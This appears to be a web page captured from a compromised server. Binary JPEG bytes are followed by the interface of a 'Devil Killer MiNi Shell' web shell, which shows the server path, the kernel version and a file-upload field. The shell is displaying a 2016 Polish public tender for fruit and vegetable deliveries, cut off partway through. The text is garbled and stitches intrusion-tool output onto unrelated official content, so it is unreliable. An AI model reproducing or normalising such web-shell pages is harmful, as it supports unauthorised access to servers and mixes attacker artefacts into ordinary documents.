JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160620/93557-N-2016.html

<p class="kh_header"><b>Warszawa: Postępowanie na sukcesywne dostawy warzyw i owoców do obiektów Centrum Usług Logistycznych</b><br>
<b>Numer ogłoszenia: 93557 - 2016; data zamieszczenia: 20.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Usług Logistycznych , ul. Słoneczna 37, 00-789 Warszawa, woj. mazowieckie, tel. 22 601 33 29, faks 22 601 50 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cul.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie na sukcesywne dostawy warzyw i owoców do obiektów Centrum Usług Logistycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 Dziwnów 1 Arbuz Kg 5% 144 2 Banan Kg 8% 765 3 Brzoskwinia Kg 5% 240 4 Buraki Kg 5% 354 5 Cebula Kg 5% 364 6 Cytryna Kg 8% 233 7 Czosnek Kg 5% 6 8 Gruszka deserowa Kg 5% 243  9 Jabłko deserowe  Gala, Champion Kg 5% 975 10 Jagoda kg 5% 76 11 Kalafior Szt 5% 60 12 Kapusta biała Kg 5% 186 13 Kapusta biała młoda Szt 5% 280 14 Kapusta czerwona Kg 5% 90 15 Kapusta kiszona wiaderko 3 i 5kg Kg 8% 220 16 Kapusta pekińska Kg 5% 227 17 Kiwi Kg 8% 150 18 Koper zielony Pęczek 5% 320 19 Mandarynka Kg 8% 80 20 Marchew Kg 5% 600 21 Nektarynka Kg 5% 260 22 Ogórek świeży długi Kg 5% 700 23 Ogórki kiszone wiaderko 3 i 5kg Kg 8% 70 24 Ogórki małosolne Kg 5% 100 25 Papryka świeża czerwona, żółta Kg 5% 362 26 Pieczarka świeża Kg 5% 100 27 Pietruszka korzeń Kg 5% 211 28 Pietruszka zielona Pęczek 5% 263 29 Pomarańcza Kg 8% 80 30 Pomidor Kg 5% 1 325 31 Por szt 5% 180 32 Rzodkiewka Pęczek 5% 240 33 Sałata lodowa Szt 5% 400 34 Sałata zielona Szt 5% 343 35 Seler Kg 5% 248 36 Szczypior Pęczek 5% 359 37 Truskawka Kg 5% 50 38 Ziemniaki Kg 5% 1 310 39 Ziemniaki młode Kg 5% 5 210 Część 2 Międzyzdroje  1  Ananas   szt.  5%  15 2  Arbuz  Kg  5%  200 3  Banan  Kg  5%  150 4  Botwina  Pęczek  5%  20 5  Brzoskwinia  Kg  5%  100 6  Buraki  Kg  5%  600 7  Cebula  Kg  5%  450 8  Cebula czerwona   Kg  5%  50 9  Cukinia  zielona   kg  5%  50 10  Cytryna  Kg  5%  500 11  Czereśnie  kg  5%  60 12  Czosnek  Kg  5%  40 13  Gruszka deserowa  Kg  5%  160 14  Jabłko deserowe  Gala, Champion  Kg  5%  600 15  Kapusta biała   Kg  5%  400 16  Kapusta biała młoda  Szt  5%  50 17  Kapusta czerwona  Kg  5%  80 18  Kapusta kiszona  Kg  8%  550 19  Kapusta pekińska  Kg  5%  200  20  Kiwi  Kg  5%  50 21  Koper  Pęczek  5%  850 22  Mandarynka  Kg  8%  150 23  Marchew  Kg  5%  1 000 24  Melon  szt.  5%  25 25  Morela   kg  5%  50 26  Nektarynka  Kg  5%  130 27  Ogórek świeży długi  Kg  5%  1 300 28  Ogórki kiszone  Kg  8%  250 29  Ogórki małosolne  Kg  5%  130 30  Papryka świeża czerwona, żółta  Kg  5%  70 31  Pieczarka świeża  Kg  5%  75 32  Pietruszka korzeń  Kg  5%  30 33  Pietruszka zielona  Pęczek  5%  900 34  Pomarańcza  Kg  8%  250 35  Pomidor  Kg  5%  2 000 36  Por  Kg  5%  100 37  Rzodkiewka  Pęczek  5%  300 38   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt  5%  100 39  Sałata lodowa  Szt  5%  180 40  Sałata zielona  Szt  5%  400 41  Seler  Kg  5%  80 42  Szczypior  Pęczek  5%  500 43  Śliwka typu renkloda  Kg  5%  50 44  Truskawka  Kg  5%  35 45  Winogrona  Kg  5%  150 46  Ziemniaki  Kg  5%  9 000  47  Ziemniaki młode  Kg  5%  1 800  Część 3 Świnoujście 1  Ananas   szt.  5%  10 2  Arbuz  Kg  5%  70 3  Banan  Kg  5%  50 4  Botwina  Pęczek  5%  20 5  Brzoskwinia  Kg  5%  60 6  Buraki  Kg  5%  300 7  Cebula  Kg  5%  200 8  Cebula czerwona   Kg  5%  50 9  Cukinia  zielona   kg  5%  20 10  Cytryna  Kg  5%  250 11  Czereśnie  kg  5%  30 12  Czosnek  Kg  5%  20 13  Gruszka deserowa  Kg  5%  100 14  Jabłko deserowe  Gala, Champion  Kg  5%  300 15  Kapusta biała   Kg  5%  200 16  Kapusta biała młoda  Szt  5%  50 17  Kapusta czerwona  Kg  5%  40 18  Kapusta kiszona  Kg  8%  250  19  Kapusta pekińska  Kg  5%  100 20  Kiwi  Kg  5%  20 21  Koper  Pęczek  5%  400 22  Mandarynka  Kg  8%  70 23  Marchew  Kg  5%  500 24  Melon  szt.  5%  10 25  Morela   kg  5%  25 26  Nektarynka  Kg  5%  75 27  Ogórek świeży długi  Kg  5%  650 28  Ogórki kiszone  Kg  8%  125 29  Ogórki małosolne  Kg  5%  65 30  Papryka świeża czerwona, żółta  Kg  5%  35 31  Pieczarka świeża  Kg  5%  35 32  Pietruszka korzeń  Kg  5%  15 33  Pietruszka zielona  Pęczek  5%  400 34  Pomarańcza  Kg  8%  125 35  Pomidor  Kg  5%  1 000 36  Por  Kg  5%  50 37  Rzodkiewka  Pęczek  5%  150 38   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt  5%  50 39  Sałata lodowa  Szt  5%  90 40  Sałata zielona  Szt  5%  200 41  Seler  Kg  5%  40 42  Szczypior  Pęczek  5%  250 43  Śliwka typu renkloda  Kg  5%  25 44  Truskawka  Kg  5%  20 45  Winogrona  Kg  5%  75 46  Ziemniaki  Kg  5%  4 000 47  Ziemniaki młode  Kg  5%  900 Część 4 Polańczyk  1  Arbuz  Kg  5%  100 2  Banan  Kg  8%  150 3  Brzoskwinia  Kg  5%  15 4  Buraki  Kg  5%  450 5  Cebula  Kg  5%  350 6  Cebula czerwona   Kg  5%  50 7  Cukinia  zielona   kg  5%  10 8  Cytryna  Kg  8%  270 9  Czosnek  szt  5%  47 10  Gruszka deserowa  Kg  5%  30 11  Jabłko deserowe  Gala, Champion  Kg  5%  540 12  Kalafior  Szt  5%  40 13  Kapusta biała   Kg  5%  330 14  Kapusta biała młoda  Szt  5%  130 15  Kapusta czerwona  Kg  5%  230 16  Kapusta kiszona wiaderko 3 i 5kg  Kg  8%   30 17  Kapusta pekińska  Kg  5%  370 18  Kiwi  Kg  8%  10 19  Koper zielony  Pęczek  5%  300 20  Mandarynka  Kg  8%  30 21  Marchew  Kg  5%  600 22  Nektarynka  Kg  5%  60 23  Ogórek świeży długi  Kg  5%  600 24  Ogórki kiszone wiaderko 3 i 5kg  Kg  8%  200 25  Papryka świeża czerwona, żółta  Kg  5%  150 26  Pieczarka świeża  Kg  5%  130 27  Pietruszka korzeń  Kg  5%  50 28  Pietruszka zielona  Pęczek  5%  260 29  Pomarańcza  Kg  8%  30 30  Pomidor  Kg  5%  1 000 31  Por  szt  5%  55 32  Rzodkiewka  Pęczek  5%  100 33   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt   5%  480 34  Sałata lodowa  Szt  5%  70 35  Sałata zielona  Szt  5%  20 36  Seler  Kg  5%  310 37  Szczypior  Pęczek  5%  275 38  Śliwka typu renkloda  Kg  5%  20 39  Winogrona czarne  Kg  5%  30 40  Winogrona białe  Kg  5%  30 41  Ziemniaki  Kg  5%  3 000 42  Ziemniaki młode  Kg  5%  1 000 Część 5 Poznań 1  Ananas   szt.  5%  50 2  Arbuz  Kg  5%  50 3  Bakłażan   kg  5%  50 4  Banan  Kg  8%  100 5  Botwina  Pęczek  5%  40 6  Brzoskwinia  Kg  5%  30 7  Buraki  Kg  5%  600 8  Cebula  Kg  5%  500 9  Cebula czerwona   Kg  5%  100 10  Cukinia  zielona   kg  5%  100 11  Cytryna  Kg  8%  200 12  Czosnek  Kg  5%  50 13  fasola szparagowa świeża żółta  kg  5%  20 14  Grapefruit  czerwony   kg  8%  40 15  Gruszka deserowa  Kg  5%  50 16  Jabłko deserowe  Gala, Champion  Kg  5%  100 17  Jagoda  kg  5%  20 18  Kalafior  Szt  5%  100 19  Kapusta biała   Kg  5%  1 500 20  Kapusta biała młoda  Szt  5%  200 21  Kapusta czerwona  Kg  5%  500 22  Kapusta kiszona wiaderko 3 i 5kg  Kg  8%  250 23  Kapusta pekińska  Kg  5%  100 24  Kiełki  lucerny  250 g  szt.  5%  100 25  Kiwi  Kg  8%  50 26  Koper zielony  Pęczek  5%  500 27  Malina  Kg  5%  20 28  Mandarynka  Kg  8%  50 29  Marchew  Kg  5%  400 30  Mięta świeża - doniczka  szt.  5%  200 31  Melon  szt.  5%  50 32  Nektarynka  Kg  5%  50 33  Ogórek świeży długi  Kg  5%  300 34  Ogórki kiszone wiaderko 3 i 5kg  Kg  8%  200 35  Ogórki gruntowe  Kg  5%  100 36  Ogórki małosolne  Kg  5%  50 37  Papryka świeża czerwona, żółta  Kg  5%  100 38  Pieczarka świeża  Kg  5%  200 39  Pietruszka korzeń  Kg  5%  100 40  Pietruszka zielona  Pęczek  5%  500 41  Pomarańcza  Kg  8%  20 42  Pomidor  Kg  5%  500 43  Pomidor cherry 250g  Kg  5%  100 44  Por  szt  5%  100 45  Rzodkiew biała  kg  5%  20 46  Rzodkiewka  Pęczek  5%  100 47   Sałata dekoracyjna  (karbowane liście zielona  lub czerwona)   Szt  5%  200 48  Sałata lodowa  Szt  5%  200 49  Sałata zielona  Szt  5%  200 50  Seler naciowy  Pęczek  5%  100  51  Seler  Kg  5%  100 52  Szczaw świeży  Pęczek  5%  50 53  Szczypior  Pęczek  5%  200 54  Śliwka typu renkloda  Kg  5%  50 55  Truskawka  Kg  5%  100 56  Winogrona czarne  Kg  5%  100 57  Winogrona białe  Kg  5%  100 58  Ziemniaki  Kg  5%  4 000 59  Ziemniaki młode  Kg  5%  500 60  bazylia - doniczka  szt  5%  200 61  Rozmaryn - doniczka  szt  5%  200 62  Brokuły  kg  5%  30 63  Szparagi   Kg  5%  10 64  Oregano - doniczka  Kg  5%  200 Część 6 Wrocław 1 Banan Kg 8% 15  2 Brzoskwinia Kg 5% 24 3 Cytryna Kg 8% 20 4 Gruszka deserowa Kg 5% 10 5 Jabłko deserowe  Gala, Champion Kg 5% 100 6 Kiełki  lucerny  250 g szt. 5% 20 7 Kiwi Kg 8% 10 8 Koper zielony Pęczek 5% 24 9 Mandarynka Kg 8% 15 10 Mięta świeża - doniczka szt. 5% 10 11 Nektarynka Kg 5% 10  12 Ogórek świeży długi Kg 5% 120 13 Ogórki kiszone wiaderko 3 i 5kg Kg 8% 20 14 Papryka świeża czerwona, żółta Kg 5% 15 15 Pietruszka zielona Pęczek 5% 15 16 Pomarańcza Kg 8% 25 17 Pomidor Kg 5% 200 18 Pomidor cherry 250g Kg 5% 7 19 Rzodkiewka Pęczek 5% 70 20 Sałata dekoracyjna  (karbowane liście zielona  lub czerwona) Szt 5% 15 21 Sałata lodowa Szt 5% 150 22 Szczypior Pęczek 5% 150 23 Truskawka Kg 5% 5 24 Winogrona czarne Kg 5% 12 25 Winogrona białe Kg 5% 15 26 Bazylia - doniczka szt 5% 10.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cul.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Olimp, ul. 1 Maja 62, 58-580 Szklarska Poręba.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2016 godzina 10:00, miejsce: Ośrodek Olimp, ul. 1 Maja 62, 58-580 Szklarska Poręba.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 Dziwnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Arbuz Kg 5% 144 2 Banan Kg 8% 765 3 Brzoskwinia Kg 5% 240 4 Buraki Kg 5% 354 5 Cebula Kg 5% 364 6 Cytryna Kg 8% 233 7 Czosnek Kg 5% 6 8 Gruszka deserowa Kg 5% 243  9 Jabłko deserowe  Gala, Champion Kg 5% 975 10 Jagoda kg 5% 76 11 Kalafior Szt 5% 60 12 Kapusta biała Kg 5% 186 13 Kapusta biała młoda Szt 5% 280 14 Kapusta czerwona Kg 5% 90 15 Kapusta kiszona wiaderko 3 i 5kg Kg 8% 220 16 Kapusta pekińska Kg 5% 227 17 Kiwi Kg 8% 150 18 Koper zielony Pęczek 5% 320 19 Mandarynka Kg 8% 80 20 Marchew Kg 5% 600 21 Nektarynka Kg 5% 260 22 Ogórek świeży długi Kg 5% 700 23 Ogórki kiszone wiaderko 3 i 5kg Kg 8% 70 24 Ogórki małosolne Kg 5% 100 25 Papryka świeża czerwona, żółta Kg 5% 362 26 Pieczarka świeża Kg 5% 100 27 Pietruszka korzeń Kg 5% 211 28 Pietruszka zielona Pęczek 5% 263 29 Pomarańcza Kg 8% 80 30 Pomidor Kg 5% 1 325 31 Por szt 5% 180 32 Rzodkiewka Pęczek 5% 240 33 Sałata lodowa Szt 5% 400 34 Sałata zielona Szt 5% 343 35 Seler Kg 5% 248 36 Szczypior Pęczek 5% 359 37 Truskawka Kg 5% 50 38 Ziemniaki Kg 5% 1 310 39 Ziemniaki młode Kg 5% 5 210.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 Międzyzdroje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1  Ananas   szt.  5%  15 2  Arbuz  Kg  5%  200 3  Banan  Kg  5%  150 4  Botwina  Pęczek  5%  20 5  Brzoskwinia  Kg  5%  100 6  Buraki  Kg  5%  600 7  Cebula  Kg  5%  450 8  Cebula czerwona   Kg  5%  50 9  Cukinia  zielona   kg  5%  50 10  Cytryna  Kg  5%  500 11  Czereśnie  kg  5%  60 12  Czosnek  Kg  5%  40 13  Gruszka deserowa  Kg  5%  160 14  Jabłko deserowe  Gala, Champion  Kg  5%  600 15  Kapusta biała   Kg  5%  400 16  Kapusta biała młoda  Szt  5%  50 17  Kapusta czerwona  Kg  5%  80 18  Kapusta kiszona  Kg  8%  550 19  Kapusta pekińska  Kg  5%  200  20  Kiwi  Kg  5%  50 21  Koper  Pęczek  5%  850 22  Mandarynka  Kg  8%  150 23  Marchew  Kg  5%  1 000 24  Melon  szt.  5%  25 25  Morela   kg  5%  50 26  Nektarynka  Kg  5%  130 27  Ogórek świeży długi  Kg  5%  1 300 28  Ogórki kiszone  Kg  8%  250 29  Ogórki małosolne  Kg  5%  130 30  Papryka świeża czerwona, żółta  Kg  5%  70 31  Pieczarka świeża  Kg  5%  75 32  Pietruszka korzeń  Kg  5%  30 33  Pietruszka zielona  Pęczek  5%  900 34  Pomarańcza  Kg  8%  250 35  Pomidor  Kg  5%  2 000 36  Por  Kg  5%  100 37  Rzodkiewka  Pęczek  5%  300 38   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt  5%  100 39  Sałata lodowa  Szt  5%  180 40  Sałata zielona  Szt  5%  400 41  Seler  Kg  5%  80 42  Szczypior  Pęczek  5%  500 43  Śliwka typu renkloda  Kg  5%  50 44  Truskawka  Kg  5%  35 45  Winogrona  Kg  5%  150 46  Ziemniaki  Kg  5%  9 000  47  Ziemniaki młode  Kg  5%  1 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 Świnoujście.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1  Ananas   szt.  5%  10 2  Arbuz  Kg  5%  70 3  Banan  Kg  5%  50 4  Botwina  Pęczek  5%  20 5  Brzoskwinia  Kg  5%  60 6  Buraki  Kg  5%  300 7  Cebula  Kg  5%  200 8  Cebula czerwona   Kg  5%  50 9  Cukinia  zielona   kg  5%  20 10  Cytryna  Kg  5%  250 11  Czereśnie  kg  5%  30 12  Czosnek  Kg  5%  20 13  Gruszka deserowa  Kg  5%  100 14  Jabłko deserowe  Gala, Champion  Kg  5%  300 15  Kapusta biała   Kg  5%  200 16  Kapusta biała młoda  Szt  5%  50 17  Kapusta czerwona  Kg  5%  40 18  Kapusta kiszona  Kg  8%  250  19  Kapusta pekińska  Kg  5%  100 20  Kiwi  Kg  5%  20 21  Koper  Pęczek  5%  400 22  Mandarynka  Kg  8%  70 23  Marchew  Kg  5%  500 24  Melon  szt.  5%  10 25  Morela   kg  5%  25 26  Nektarynka  Kg  5%  75 27  Ogórek świeży długi  Kg  5%  650 28  Ogórki kiszone  Kg  8%  125 29  Ogórki małosolne  Kg  5%  65 30  Papryka świeża czerwona, żółta  Kg  5%  35 31  Pieczarka świeża  Kg  5%  35 32  Pietruszka korzeń  Kg  5%  15 33  Pietruszka zielona  Pęczek  5%  400 34  Pomarańcza  Kg  8%  125 35  Pomidor  Kg  5%  1 000 36  Por  Kg  5%  50 37  Rzodkiewka  Pęczek  5%  150 38   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt  5%  50 39  Sałata lodowa  Szt  5%  